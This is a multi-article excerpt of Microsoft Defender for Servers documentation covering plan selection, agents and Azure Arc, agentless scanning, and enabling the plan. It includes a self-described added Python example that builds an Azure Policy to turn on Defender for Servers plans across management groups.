In addition to the built-in Owner, Contributor, and Reader roles for an Azure subscription and resource group, Defender for Cloud has built-in roles that control Defender for Cloud access:

- Security Reader: Provides viewing rights to Defender for Cloud recommendations, alerts, security policy, and states. This role can't make changes to Defender for Cloud settings.
- Security Admin: Provides Security Reader rights and the ability to update security policy, dismiss alerts and recommendations, and apply recommendations.


Learn more about allowed role actions. 


Next steps 


After you work through these planning steps, decide which Defender for Servers plan is 
right for your organization. 


Select a Defender for Servers plan 


Article e 08/01/2023 


This article helps you select the Microsoft Defender for Servers plan that's right for your 
organization. 


Defender for Servers is one of the paid plans provided by Microsoft Defender for Cloud. 


Before you begin 


This article is the fourth article in the Defender for Servers planning guide. Before you begin, review the earlier articles:


1. Start planning your deployment 
2. Understand where your data is stored and Log Analytics workspace requirements 
3. Review access and role requirements 


Review plans 


You can choose from two Defender for Servers paid plans:

- Defender for Servers Plan 1 is entry-level and must be enabled at the subscription level. Features include:
  - Foundational cloud security posture management (CSPM), which is provided free by Defender for Cloud.
  - For Azure virtual machines and Amazon Web Services (AWS) and Google Cloud Platform (GCP) machines, you don't need a Defender for Cloud plan enabled to use foundational CSPM features.
  - For on-premises servers, machines must be onboarded to Azure with Azure Arc, and Defender for Servers must be enabled, to receive configuration recommendations.
  - Endpoint detection and response (EDR) features that are provided by Microsoft Defender for Endpoint Plan 2.

- Defender for Servers Plan 2 provides all features. The plan must be enabled at the subscription level and at the workspace level to get full feature coverage. Features include:
  - All the functionality that's provided by Defender for Servers Plan 1.
  - More extended detection and response (XDR) capabilities.

Note

Plan 1 and Plan 2 for Defender for Servers aren't the same as Plan 1 and Plan 2 for Defender for Endpoint.


Plan features

Feature: Defender for Endpoint integration
Plan 1: Yes. Plan 2: Yes.
Defender for Servers integrates with Defender for Endpoint and protects servers with all the features, including:
- Attack surface reduction to lower the risk of attack.
- Next-generation protection, including real-time scanning and protection and Microsoft Defender Antivirus.
- EDR, including threat analytics, automated investigation and response, advanced hunting, and Microsoft Defender Experts.
- Vulnerability assessment and mitigation provided by Microsoft Defender Vulnerability Management (MDVM) as part of the Defender for Endpoint integration. With Plan 2, you can get premium MDVM features, provided by the MDVM add-on.

Feature: Licensing
Plan 1: Yes. Plan 2: Yes.
Defender for Servers covers licensing for Defender for Endpoint. Licensing is charged per hour instead of per seat, lowering costs by protecting virtual machines only when they're in use.

Feature: Defender for Endpoint provisioning
Plan 1: Yes. Plan 2: Yes.
Defender for Servers automatically provisions the Defender for Endpoint sensor on every supported machine that's connected to Defender for Cloud.

Feature: Unified view
Plan 1: Yes. Plan 2: Yes.
Defender for Endpoint alerts appear in the Defender for Cloud portal. You can get detailed information in the Defender for Endpoint portal.

Feature: Threat detection for OS-level (agent-based)
Plan 1: Provided by MDE. Plan 2: Yes.
Defender for Servers and Defender for Endpoint detect threats at the OS level, including virtual machine behavioral detections and fileless attack detection, which generates detailed security alerts that accelerate alert triage, correlation, and downstream response time. Learn more about alerts for Windows machines, alerts for Linux machines, and alerts for DNS.

Feature: Threat detection for network-level (agentless security alerts)
Plan 1: Not supported. Plan 2: Yes.
Defender for Servers detects threats that are directed at the control plane on the network, including network-based security alerts for Azure virtual machines.

Feature: Microsoft Defender Vulnerability Management (MDVM) Add-on
Plan 1: Not supported. Plan 2: Yes.
Enhance your vulnerability management program with consolidated asset inventories, security baselines assessments, application block feature, and more. Learn more.

Feature: Security Policy and Regulatory Compliance
Plan 1: Not supported. Plan 2: Yes.
Customize a security policy for your subscription and also compare the configuration of your resources with requirements in industry standards, regulations, and benchmarks. Learn more about regulatory compliance and security policies.

Feature: Qualys vulnerability assessment
Plan 1: Not supported. Plan 2: Yes.
As an alternative to Defender Vulnerability Management, Defender for Cloud can deploy a Qualys scanner and display the findings. You don't need a Qualys license or account.

Feature: Adaptive application controls
Plan 1: Not supported. Plan 2: Yes.
Adaptive application controls define allowlists of known safe applications for machines. To use this feature, Defender for Cloud must be enabled on the subscription.

Feature: Free data ingestion (500 MB) to Log Analytics workspaces
Plan 1: Not supported. Plan 2: Yes.
Free data ingestion is available for specific data types to Log Analytics workspaces. Data ingestion is calculated per node, per reported workspace, and per day. It's available for every workspace that has a Security or AntiMalware solution installed.

Feature: Just-in-time virtual machine access
Plan 1: Not supported. Plan 2: Yes.
Just-in-time virtual machine access locks down machine ports to reduce the attack surface. To use this feature, Defender for Cloud must be enabled on the subscription.

Feature: Adaptive network hardening
Plan 1: Not supported. Plan 2: Yes.
Network hardening filters traffic to and from resources by using network security groups (NSGs) to improve your network security posture. Further improve security by hardening the NSG rules based on actual traffic patterns. To use this feature, Defender for Cloud must be enabled on the subscription.

Feature: File integrity monitoring
Plan 1: Not supported. Plan 2: Yes.
File integrity monitoring examines files and registries for changes that might indicate an attack. A comparison method is used to determine whether suspicious modifications have been made to files.

Feature: Docker host hardening
Plan 1: Not supported. Plan 2: Yes.
Assesses containers hosted on Linux machines running Docker containers, and then compares them with the Center for Internet Security (CIS) Docker Benchmark.

Feature: Network map
Plan 1: Not supported. Plan 2: Yes.
Provides a geographical view of recommendations for hardening your network resources.

Feature: Agentless scanning
Plan 1: Not supported. Plan 2: Yes.
Scans Azure virtual machines by using cloud APIs to collect data.
Note

Once a plan is enabled, a 30-day trial period begins. There is no way to stop, pause, or extend this trial period. To enjoy the full 30-day trial, make sure to plan ahead to meet your evaluation purposes.


Select a vulnerability assessment solution 


A couple of vulnerability assessment options are available in Defender for Servers:

- Microsoft Defender Vulnerability Management: Integrated with Defender for Endpoint.
  - Available in Defender for Servers Plan 1 and Defender for Servers Plan 2.
  - Defender Vulnerability Management is enabled by default on machines that are onboarded to Defender for Endpoint.
  - Has the same Windows, Linux, and network prerequisites as Defender for Endpoint.
  - No extra software is required.

  Note

  Microsoft Defender Vulnerability Management Add-on capabilities are included in Defender for Servers Plan 2. This provides consolidated inventories, new assessments, and mitigation tools to further enhance your vulnerability management program. To learn more, see Vulnerability Management capabilities for servers.

  Defender Vulnerability Management add-on capabilities are only available through the Microsoft Defender 365 portal.

- Qualys vulnerability scanner: Provided by Defender for Cloud Qualys integration.
  - Available only in Defender for Servers Plan 2.
  - A great fit if you're using a third-party EDR solution or a Fanotify-based solution. In these scenarios, you might not be able to deploy Defender for Endpoint for vulnerability assessment.
  - The integrated Defender for Cloud Qualys solution doesn't support a proxy configuration, and it can't connect to an existing Qualys deployment. Vulnerability findings are available only in Defender for Cloud.


Next steps 


After you work through these planning steps, review Azure Arc and agent and extension 
requirements. 


Plan agents, extensions, and Azure Arc 
for Defender for Servers 
This article helps you plan your agents, extensions, and Azure Arc resources for your Microsoft Defender for Servers deployment.


Defender for Servers is one of the paid plans provided by Microsoft Defender for Cloud. 


Before you begin 


This article is the fifth article in the Defender for Servers planning guide. Before you begin, review the earlier articles:

1. Start planning your deployment
2. Understand where your data is stored and Log Analytics workspace requirements
3. Review Defender for Servers access roles
4. Select a Defender for Servers plan


Review Azure Arc requirements 


Azure Arc helps you onboard Amazon Web Services (AWS), Google Cloud Platform 
(GCP), and on-premises machines to Azure. Defender for Cloud uses Azure Arc to 
protect non-Azure machines. 


Foundational cloud security posture management 


For free foundational cloud security posture management (CSPM) features, Azure Arc 
running on AWS or GCP machines isn't required. For full functionality, we recommend 
that you do have Azure Arc running on AWS or GCP machines. 


Azure Arc onboarding is required for on-premises machines. 


Defender for Servers plan 


To use Defender for Servers, all AWS, GCP, and on-premises machines should be Azure 
Arc-enabled. 


You can onboard the Azure Arc agent to your AWS or GCP servers automatically with the 
AWS or GCP multicloud connector. 


Plan for Azure Arc deployment 

To plan for Azure Arc deployment:

1. Review the Azure Arc planning recommendations and deployment prerequisites.
2. Open the network ports for Azure Arc in your firewall.
3. Azure Arc installs the Connected Machine agent to connect to and manage machines that are hosted outside of Azure. Review the following information:
   - The agent components and data collected from machines.
   - Network and internet access for the agent.
   - Connection options for the agent.


Log Analytics agent and Azure Monitor agent 


Defender for Cloud uses the Log Analytics agent and the Azure Monitor agent to collect information from compute resources. Then, it sends the data to a Log Analytics workspace for more analysis. Review the differences and recommendations for both agents.


The following table describes the agents that are used in Defender for Servers:

Feature: Foundational CSPM recommendations (free) that depend on the agent: OS baseline recommendation (Azure VMs)
Log Analytics agent: Yes. Azure Monitor agent: Yes. With the Azure Monitor agent, the Azure Policy guest configuration extension is used.

Feature: Foundational CSPM: System updates recommendations (Azure VMs)
Log Analytics agent: Yes. Azure Monitor agent: Not yet available.

Feature: Foundational CSPM: Antimalware/endpoint protection recommendations (Azure VMs)
Log Analytics agent: Yes. Azure Monitor agent: Yes.

Feature: Attack detection at the OS level and network layer, including fileless attack detection
Log Analytics agent: Yes (Plan 2). Azure Monitor agent: Yes (Plan 2). Plan 1 relies on Defender for Endpoint capabilities for attack detection.

Feature: File integrity monitoring (Plan 2 only)
Log Analytics agent: Yes. Azure Monitor agent: Yes.

Feature: Adaptive application controls (Plan 2 only)
Log Analytics agent: Yes. Azure Monitor agent: Yes.


Qualys extension 


The Qualys extension is available in Defender for Servers Plan 2. The extension is 
deployed if you want to use Qualys for vulnerability assessment. 


Here's more information: 


- The Qualys extension sends metadata for analysis to one of two Qualys datacenter regions, depending on your Azure region.
  - If you're in a European Azure geography, data is processed in the Qualys European datacenter.
  - For other regions, data is processed in the US datacenter.

- To use Qualys on a machine, the extension must be installed and the machine must be able to communicate with the relevant network endpoint:
  - Europe datacenter: https://qagpublic.qg2.apps.qualys.eu
  - US datacenter: https://qagpublic.qg3.apps.qualys.com


Guest configuration extension 


The extension performs audit and configuration operations inside VMs. 


- If you're using the Azure Monitor Agent, Defender for Cloud uses this extension to analyze operating system security baseline settings on Windows and Linux machines.

- Although Azure Arc-enabled servers and the guest configuration extension are free, more costs might apply if you use guest configuration policies on Azure Arc servers outside the scope of Defender for Cloud.


Learn more about the Azure Policy guest configuration extension. 


Defender for Endpoint extensions 


When you enable Defender for Servers, Defender for Cloud automatically deploys a 
Defender for Endpoint extension. The extension is a management interface that runs a 
script inside the operating system to deploy and integrate the Defender for Endpoint 
sensor on the machine. 


- Windows machines extension: MDE.Windows
- Linux machines extension: MDE.Linux
- Machines must meet minimum requirements.
- Some Windows Server versions have specific requirements.


Verify operating system support 


Before you deploy Defender for Servers, verify operating system support for agents and 
extensions: 


- Verify that your operating systems are supported by Defender for Endpoint.
- Check requirements for the Azure Arc Connected Machine agent.
- Check operating system support for the Log Analytics agent and Azure Monitor agent.


Review agent provisioning 


When you enable Defender for Cloud plans, including Defender for Servers, you can choose to automatically provision some agents that are relevant for Defender for Servers:

- Log Analytics agent and Azure Monitor agent for Azure VMs
- Log Analytics agent and Azure Monitor agent for Azure Arc VMs
- Qualys agent
- Guest configuration agent


When you enable Defender for Servers Plan 1 or Plan 2, the Defender for Endpoint 
extension is automatically provisioned on all supported machines in the subscription. 


Provisioning considerations 


The following table describes provisioning considerations to be aware of:

Defender for Endpoint sensor: If machines are running Microsoft Antimalware, also known as System Center Endpoint Protection (SCEP), the Windows extension automatically removes it from the machine. If you deploy on a machine that already has the legacy Microsoft Monitoring agent (MMA) Defender for Endpoint sensor running, after the Defender for Cloud and Defender for Endpoint unified solution is successfully installed, the extension stops and disables the legacy sensor. The change is transparent and the machine's protection history is preserved.

AWS and GCP machines: Configure automatic provisioning when you set up the AWS or GCP connector.

Manual installation: If you don't want Defender for Cloud to provision the Log Analytics agent and Azure Monitor agent, you can install agents manually. You can connect the agent to the default Defender for Cloud workspace or to a custom workspace. The workspace must have the SecurityCenterFree (for free foundational CSPM) or Security solution enabled (Defender for Servers Plan 2).

Log Analytics agent running directly: If a Windows VM has the Log Analytics agent running but not as a VM extension, Defender for Cloud installs the extension. The agent reports to the Defender for Cloud workspace and to the existing agent workspace. On Linux VMs, multi-homing isn't supported. If an existing agent exists, the Log Analytics agent isn't automatically provisioned.

Operations Manager agent: The Log Analytics agent can work side by side with the Operations Manager agent. The agents share common runtime libraries that are updated when the Log Analytics agent is deployed.

Removing the Log Analytics extension: If you remove the Log Analytics extension, Defender for Cloud can't collect security data and recommendations, and alerts will be missing. Within 24 hours, Defender for Cloud determines that the extension is missing and reinstalls it.


When to opt out of auto provisioning 


You might want to opt out of automatic provisioning in the circumstances that are described in the following table:

Situation: You have critical VMs that shouldn't have agents installed
Relevant agent: Log Analytics agent, Azure Monitor agent
Details: Automatic provisioning is for an entire subscription. You can't opt out for specific machines.

Situation: You're running the System Center Operations Manager agent version 2012 with Operations Manager 2012
Relevant agent: Log Analytics agent
Details: With this configuration, don't turn on automatic provisioning. Management capabilities might be lost.

Situation: You want to configure a custom workspace
Relevant agent: Log Analytics agent, Azure Monitor agent
Details: You have two options with a custom workspace:
- Opt out of automatic provisioning when you first set up Defender for Cloud. Then, configure provisioning on your custom workspace.
- Let automatic provisioning run to install the Log Analytics agents on machines. Set a custom workspace, and then reconfigure existing VMs with the new workspace setting.

Next steps


After working through these planning steps, you can start deployment: 


- Enable Defender for Servers plans.
- Connect on-premises machines to Azure.
- Connect AWS accounts to Defender for Cloud.
- Connect GCP projects to Defender for Cloud.
- Learn about scaling your Defender for Servers deployment.


Learn about agentless scanning 
Microsoft Defender for Cloud maximizes coverage on OS posture issues and extends beyond the reach of agent-based assessments. With agentless scanning for VMs, you can get frictionless, wide, and instant visibility on actionable posture issues without installed agents, network connectivity requirements, or machine performance impact.


Agentless scanning for VMs provides vulnerability assessment and software inventory, 
both powered by Microsoft Defender Vulnerability Management, in Azure and Amazon 
AWS environments. Agentless scanning is available in both Defender Cloud Security 
Posture Management (CSPM) and Defender for Servers P2. 


Availability 


Aspect: Release state
GA

Aspect: Pricing
Requires either Defender Cloud Security Posture Management (CSPM) or Microsoft Defender for Servers Plan 2

Aspect: Supported use cases
Supported: Vulnerability assessment (powered by Defender Vulnerability Management); Software inventory (powered by Defender Vulnerability Management); Secret scanning (Preview)

Aspect: Clouds
Supported: Azure Commercial clouds; Connected AWS accounts; Connected GCP projects
Not supported: Azure Government; Microsoft Azure operated by 21Vianet

Aspect: Operating systems
Supported: Windows; Linux

Aspect: Instance and disk types
Azure. Supported: Standard VMs; Virtual machine scale set - Flex. Not supported: Unmanaged disks; Virtual machine scale set - Uniform
AWS. Supported: EC2; Auto Scale instances. Not supported: Instances with a ProductCode (Paid AMIs)
GCP. Supported: Compute instances; Instance groups (managed and unmanaged)

Aspect: Encryption
Azure. Supported: Unencrypted; Encrypted - managed disks using Azure Storage encryption with platform-managed keys (PMK). Not supported: Encrypted - other scenarios using platform-managed keys (PMK); Encrypted - customer-managed keys (CMK)
AWS. Supported: Unencrypted; Encrypted - PMK; Encrypted - CMK
GCP. Supported: Google-managed encryption key; Customer-managed encryption key (CMEK). Not supported: Customer-supplied encryption key (CSEK)


How agentless scanning for VMs works 


While agent-based methods use OS APIs in runtime to continuously collect security 
related data, agentless scanning for VMs uses cloud APIs to collect data. Defender for 
Cloud takes snapshots of VM disks and does an out-of-band, deep analysis of the OS 
configuration and file system stored in the snapshot. The copied snapshot doesn't leave 
the original compute region of the VM, and the VM is never impacted by the scan. 


After the necessary metadata is acquired from the disk, Defender for Cloud immediately 
deletes the copied snapshot of the disk and sends the metadata to Microsoft engines to 
analyze configuration gaps and potential threats. For example, in vulnerability 
assessment, the analysis is done by Defender Vulnerability Management. The results are 
displayed in Defender for Cloud, seamlessly consolidating agent-based and agentless 
results. 


The scanning environment where disks are analyzed is regional, volatile, isolated, and 
highly secure. Disk snapshots and data unrelated to the scan aren't stored longer than is 
necessary to collect the metadata, typically a few minutes. 


[Diagram: three columns. Customer account: the virtual machine and its disk snapshot. Isolated scanning environment: a regional environment containing the scanning platform, which reads the copied snapshot. Defender for Cloud portal: where the vulnerability assessment results are displayed.]


Next steps 


This article explains how agentless scanning works and how it helps you collect data 
from your machines. 


- Learn more about how to enable agentless scanning for VMs.
- Check out common questions about agentless scanning and how it affects the subscription/account, agentless data collection, and permissions used by agentless scanning.


Scale a Defender for Servers 
deployment 
This article helps you scale your Microsoft Defender for Servers deployment.


Defender for Servers is one of the paid plans provided by Microsoft Defender for Cloud. 


Before you begin 


This article is the sixth and final article in the Defender for Servers planning guide series. 
Before you begin, review the earlier articles: 


1. Start planning your deployment 

2. Understand where your data is stored and Log Analytics workspace requirements 
3. Review access and role requirements 

4. Select a Defender for Servers plan 

5. Review requirements for agents, extensions, and Azure Arc resources 


Scaling overview

When you enable a Defender for Cloud subscription, this process occurs:

1. The microsoft.security resource provider is automatically registered on the subscription.
2. At the same time, the Cloud Security Benchmark initiative that's responsible for creating security recommendations and calculating the secure score is assigned to the subscription.
3. After you enable Defender for Cloud on the subscription, you turn on Defender for Servers Plan 1 or Defender for Servers Plan 2, and then you enable auto provisioning.


In the next sections, review considerations for specific steps as you scale your 
deployment: 


- Scale a Cloud Security Benchmark deployment
- Scale a Defender for Servers plan
- Scale auto provisioning


Scale a Cloud Security Benchmark deployment 


In a scaled deployment, you might want the Cloud Security Benchmark (formerly the 
Azure Security Benchmark) to be automatically assigned. 


The assignment is inherited for every existing and future subscription in the 
management group. To set up your deployment to automatically apply the benchmark, 
assign the policy initiative to your management group (root) instead of to each 
subscription. 


You can get the Azure Security Benchmark policy definition on GitHub.


Learn more about using a built-in policy definition to register a resource provider. 


Scale a Defender for Servers plan 


You can use a policy definition to enable Defender for Servers at scale:

- To get the built-in Configure Azure Defender for Servers to be enabled policy definition, in the Azure portal for your deployment, go to Azure Policy > Policy Definitions.


[Screenshot: Azure Policy > Definitions, filtered on "Defender for Server", listing the built-in Security Center policy definitions, including Azure Defender for servers should be enabled.]


- Alternatively, you can use a custom policy to enable Defender for Servers and select the plan at the same time.

- You can enable only one Defender for Servers plan on each subscription. You can't enable both Defender for Servers Plan 1 and Plan 2 on the same subscription.

- If you want to use both plans in your environment, divide your subscriptions into two management groups. On each management group, assign a policy to enable the respective plan on each underlying subscription.
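The following Python builds a custom policy definition of the kind the first bullet describes, together with the two management-group assignments the last bullet calls for (one pinned to P1, one to P2). It is an added example and not Microsoft's built-in Configure Azure Defender for Servers to be enabled definition: the Microsoft.Security/pricings resource, its VirtualMachines name and its pricingTier/subPlan properties are documented Azure surface, while the Microsoft.Security/pricings/subPlan policy alias, the 2023-01-01 API version, the deployment region and the management group names are assumptions to verify in your own tenant before assigning.

```python
"""Parameterized Azure Policy (DeployIfNotExists) that turns on a Defender for
Servers plan on every subscription under the management group it's assigned to.

Added example, not Microsoft's built-in definition. The subPlan policy alias
and the API version are assumptions; verify them in your tenant first.
"""
import json

# Built-in Security Admin role: the assignment's managed identity needs it to
# write Microsoft.Security/pricings on each underlying subscription.
SECURITY_ADMIN_ROLE = (
    "/providers/Microsoft.Authorization/roleDefinitions/"
    "fb1c8493-542b-48eb-b624-b4c8fea62acd"
)
VALID_SUB_PLANS = ("P1", "P2")
PRICING_TIER_ALIAS = "Microsoft.Security/pricings/pricingTier"
SUB_PLAN_ALIAS = "Microsoft.Security/pricings/subPlan"  # assumed alias, verify


def build_policy_definition(deployment_location: str = "westeurope") -> dict:
    """Definition body (mode, parameters, policyRule) for a custom definition."""
    template = {
        "$schema": ("https://schema.management.azure.com/schemas/2018-05-01/"
                    "subscriptionDeploymentTemplate.json#"),
        "contentVersion": "1.0.0.0",
        "parameters": {"subPlan": {"type": "string"}},
        "resources": [{
            "type": "Microsoft.Security/pricings",
            "apiVersion": "2023-01-01",
            "name": "VirtualMachines",  # the Defender for Servers plan
            "properties": {
                "pricingTier": "Standard",
                "subPlan": "[parameters('subPlan')]",
            },
        }],
    }
    return {
        "mode": "All",
        "parameters": {"subPlan": {
            "type": "String",
            "allowedValues": list(VALID_SUB_PLANS),
            "defaultValue": "P2",
        }},
        "policyRule": {
            # Evaluate each subscription itself, not the resources inside it.
            "if": {"field": "type", "equals": "Microsoft.Resources/subscriptions"},
            "then": {
                "effect": "DeployIfNotExists",
                "details": {
                    "type": "Microsoft.Security/pricings",
                    "name": "VirtualMachines",
                    "deploymentScope": "subscription",
                    "existenceScope": "subscription",
                    "roleDefinitionIds": [SECURITY_ADMIN_ROLE],
                    # Compliant only when tier AND sub plan match. A subscription
                    # already on the other plan is non-compliant and would be
                    # switched, which is why P1 and P2 subscriptions must sit
                    # under separate management groups with separate assignments.
                    "existenceCondition": {"allOf": [
                        {"field": PRICING_TIER_ALIAS, "equals": "Standard"},
                        {"field": SUB_PLAN_ALIAS, "equals": "[parameters('subPlan')]"},
                    ]},
                    "deployment": {
                        "location": deployment_location,
                        "properties": {
                            "mode": "incremental",
                            "template": template,
                            "parameters": {
                                "subPlan": {"value": "[parameters('subPlan')]"},
                            },
                        },
                    },
                },
            },
        },
    }


def build_assignment(management_group_id: str, sub_plan: str,
                     definition_id: str) -> dict:
    """Assignment body: one per management group, each pinned to one sub plan."""
    if sub_plan not in VALID_SUB_PLANS:
        raise ValueError(f"sub_plan must be one of {VALID_SUB_PLANS}, got {sub_plan!r}")
    return {
        "scope": f"/providers/Microsoft.Management/managementGroups/{management_group_id}",
        "policyDefinitionId": definition_id,
        "parameters": {"subPlan": {"value": sub_plan}},
        "identity": {"type": "SystemAssigned"},  # runs the DeployIfNotExists deployment
    }


if __name__ == "__main__":
    # Hypothetical management group names and definition ID; replace with yours.
    definition_id = ("/providers/Microsoft.Management/managementGroups/contoso-root"
                     "/providers/Microsoft.Authorization/policyDefinitions/enable-defender-servers")
    print(json.dumps(build_policy_definition(), indent=2))
    for mg, plan in (("mg-servers-p1", "P1"), ("mg-servers-p2", "P2")):
        print(json.dumps(build_assignment(mg, plan, definition_id), indent=2))
```

Write the policyRule and parameters objects to files and create the definition once at the root management group with az policy definition create --management-group ... --rules ... --params ..., then assign it twice with az policy assignment create --scope <management group> --mi-system-assigned --location <region> --params ..., passing P1 to one management group and P2 to the other. A DeployIfNotExists policy only fixes subscriptions that already exist when you start a remediation task (az policy remediation create); subscriptions created later under the management group are remediated as they appear.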


Scale auto provisioning 


You can set up auto provisioning by assigning the built-in policy definitions to an Azure 
management group to cover underlying subscriptions. The following table summarizes 
the definitions: 


Agent: Log Analytics agent (default workspace)
Policy: Enable Security Center's autoprovisioning of the Log Analytics agent on your subscriptions with default workspaces

Agent: Log Analytics agent (custom workspace)
Policy: Enable Security Center's autoprovisioning of the Log Analytics agent on your subscriptions with custom workspaces

Agent: Azure Monitor agent (default data collection rule)
Policy: [Preview]: Configure Arc machines to create the default Microsoft Defender for Cloud pipeline using Azure Monitor Agent; [Preview]: Configure virtual machines to create the default Microsoft Defender for Cloud pipeline using Azure Monitor Agent

Agent: Azure Monitor agent (custom data collection rule)
Policy: [Preview]: Configure Arc machines to create the Microsoft Defender for Cloud user-defined pipeline using Azure Monitor Agent; [Preview]: Configure machines to create the Microsoft Defender for Cloud user-defined pipeline using Azure Monitor Agent

Agent: Qualys vulnerability assessment
Policy: Configure machines to receive a vulnerability assessment provider

Agent: Guest configuration extension
Policy: See Overview and prerequisites (guest configuration)


To review policy definitions, in the Azure portal, go to Policy > Definitions. 


Next steps 


Begin a deployment for your scenario: 


e Enable a Defender for Servers plan 


e Connect an on-premises machine to Azure 


e Connect an AWS account to Defender for Cloud 


e Connect a GCP project to Defender for Cloud 


Protect your servers with Defender for Servers

Defender for Servers in Microsoft Defender for Cloud brings threat detection and 
advanced defenses to your Windows and Linux machines that run in Azure, Amazon 
Web Services (AWS), Google Cloud Platform (GCP), and on-premises environments. This 
plan includes the integrated license for Microsoft Defender for Endpoint, security 
baselines and OS level assessments, vulnerability assessment scanning, adaptive 
application controls (AAC), file integrity monitoring (FIM), and more. 


Microsoft Defender for Servers includes an automatic, native integration with Microsoft Defender for Endpoint. Learn more in Protect your endpoints with Defender for Cloud's integrated EDR solution: Microsoft Defender for Endpoint. With this integration enabled, you have access to the vulnerability findings from Microsoft threat and vulnerability management.


Defender for Servers offers two plan options with different levels of protection and their own cost. You can learn more about Defender for Cloud's pricing on the pricing page.


Prerequisites 


- You need a Microsoft Azure subscription. If you don't have an Azure subscription, you can sign up for a free subscription.
- You must enable Microsoft Defender for Cloud on your Azure subscription.
- Review the Defender for Servers deployment guide.


Enable the Defender for Servers plan 


You can enable the Defender for Servers plan from the Environment settings page to 
protect all the machines in an Azure subscription, AWS account, or GCP project. 


To enable the Defender for Servers plan:

1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud.
3. In the Defender for Cloud menu, select Environment settings.
4. Select the relevant subscription.
5. On the Defender plans page, toggle the Servers switch to On.

[Screenshot: Defender plans page with the Servers plan toggled On. When you select Save, Microsoft Defender for Cloud's enhanced security features are enabled on all the resource types you've selected. The first 30 days are free.]


Select a Defender for Servers plan 


When you enable the Defender for Servers plan, you're given the option to select which plan to enable. Plan 1 and Plan 2 offer different levels of protection for your resources. Review what's included in each plan.

To select a Defender for Servers plan:

1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud.
3. In the Defender for Cloud menu, select Environment settings.
4. Select the relevant Azure subscription, AWS account, or GCP project.
5. Select Change plans.


[Screenshot: Environment settings > Defender plans, showing the Change plans link for the Servers plan.]


6. In the popup window, select Plan 2 or Plan 1. 


[Screenshot: Plan selection pane. Defender for servers is offered in two plans. Plan 1 provides a limited set of defenses with a focus on Defender for Endpoint's protections. Plan 2 (formerly "Defender for servers") offers the full set of Defender for Cloud's enhanced security features, priced per server per month: agentless vulnerability scanning, Microsoft Defender for Endpoint, Microsoft Defender Vulnerability Management, automatic agent onboarding with alert and data integration, just-in-time VM access for management ports, network layer threat detection, adaptive application controls, file integrity monitoring, adaptive network hardening, integrated vulnerability assessment powered by Qualys, and 500 MB of free Log Analytics data ingestion.]


7. Select Confirm. 


8. Select Save. 


Configure monitoring coverage 


There are three components that can be enabled and configured to provide extra 
protections to your environments in the Defender for Servers plans. 


Component: Log Analytics agent/Azure Monitor agent
Description: Collects security-related configurations and event logs from the machine and stores the data in your Log Analytics workspace for analysis.
Learn more: Learn more about the Log Analytics agent.

Component: Vulnerability assessment for machines
Description: Enables vulnerability assessment on your Azure and hybrid machines.
Learn more: Learn more about how Defender for Cloud collects data.

Component: Agentless scanning for machines
Description: Scans your machines for installed software and vulnerabilities without relying on agents or impacting machine performance.
Learn more: Learn more about agentless scanning for machines.


Toggle the corresponding switch to On, to enable any of these options. 


Configure Log Analytics agent/Azure Monitor agent 


After enabling the Log Analytics agent/Azure Monitor agent, you'll be presented with 
the option to select either the Log Analytics agent or the Azure Monitor agent and 
which workspace should be utilized. 


To configure the Log Analytics agent/Azure Monitor agent: 


1. Select Edit configuration. 


[Screenshot: Settings & monitoring page listing the components, with the Edit configuration link for the Log Analytics agent/Azure Monitor agent.]


2. In the Auto provisioning configuration window, select one of the following two agent types:

  - Log Analytics Agent (Default) - Collects security-related configurations and event logs from the machine and stores the data in your Log Analytics workspace for analysis.
  - Azure Monitor Agent (Preview) - Collects security-related configurations and event logs from the machine and stores the data in your Log Analytics workspace for analysis.


[Screenshot: Auto-provisioning configuration pane with Agent type (Log Analytics Agent or Azure Monitor Agent), Workspace selection (Default workspace(s) or Custom workspace) and Security events storage (All Events). The pane notes: when selecting a custom workspace, make sure the relevant solutions are enabled on it; if a VM already has either the SCOM or OMS agent installed locally, the Log Analytics agent extension is still installed and connected to the configured workspace; any other solutions enabled on the selected workspace are applied to Azure VMs connected to it, which for paid solutions can result in additional charges; for data privacy, make sure the selected workspace is in your desired region.]


3. Select either a Default workspace(s) or a Custom workspace depending on your 
need. 


4. Select Apply. 


Configure vulnerability assessment for machines 


Vulnerability assessment for machines allows you to select between two vulnerability 
assessment solutions: 


- Microsoft Defender vulnerability management
- Microsoft Defender for Cloud integrated Qualys scanner


To select either of the vulnerability assessment solutions: 


1. Select Edit configuration. 


[Screenshot: Settings & monitoring page. When you enable an extension, it's installed on any new or existing resource by assigning a security policy. The Vulnerability assessment for machines row shows Microsoft Defender vulnerability management selected, with an Edit configuration link.]


2. In the Extension deployment configuration window, select either of the solutions 
depending on your need. 


3. Select Apply. 


Configure agentless scanning for machines (preview) 


Defender for Cloud has the ability to scan your Azure machines for installed software 
and vulnerabilities without requiring you to install agents, have network connectivity or 
affect your machine's performance. 


To configure agentless scanning for machines: 


1. Select Edit configuration. 


[Screenshot: Settings & monitoring page for the Servers plan, with Edit configuration links for Log Analytics agent/Azure Monitor agent, Vulnerability assessment for machines, and Agentless scanning for machines (preview).]


2. Enter a tag name and tag value for any machines to be excluded from scans. 


3. Select Apply. 


Next steps 


Overview of Microsoft Defender for Servers 


Enable agentless scanning for VMs

Agentless scanning provides visibility into installed software and software vulnerabilities 
on your workloads to extend vulnerability assessment coverage to server workloads 
without a vulnerability assessment agent installed. 


Learn more about agentless scanning. 


Agentless vulnerability assessment uses the Microsoft Defender Vulnerability 
Management engine to assess vulnerabilities in the software installed on your VMs, 
without requiring Defender for Endpoint to be installed. Vulnerability assessment shows 
software inventory and vulnerability results in the same format as the agent-based 
assessments. 


Compatibility with agent-based vulnerability 
assessment solutions 


Defender for Cloud already supports different agent-based vulnerability scans, including 
Microsoft Defender Vulnerability Management (MDVM), BYOL and Qualys. Agentless 
scanning extends the visibility of Defender for Cloud to reach more devices. 


When you enable agentless vulnerability assessment: 


- If you have no existing integrated vulnerability assessment solutions enabled on any of your VMs on your subscription, Defender for Cloud automatically enables MDVM by default.

- If you select Microsoft Defender Vulnerability Management as part of an integration with Microsoft Defender for Endpoint, Defender for Cloud shows a unified and consolidated view that optimizes coverage and freshness.

  - Machines covered by just one of the sources (Defender Vulnerability Management or agentless) show the results from that source.
  - Machines covered by both sources show the agent-based results only for increased freshness.

- If you select Vulnerability assessment with Qualys or BYOL integrations, Defender for Cloud shows the agent-based results by default. Results from the agentless scan are shown for machines that don't have an agent installed or for machines that aren't reporting findings correctly.

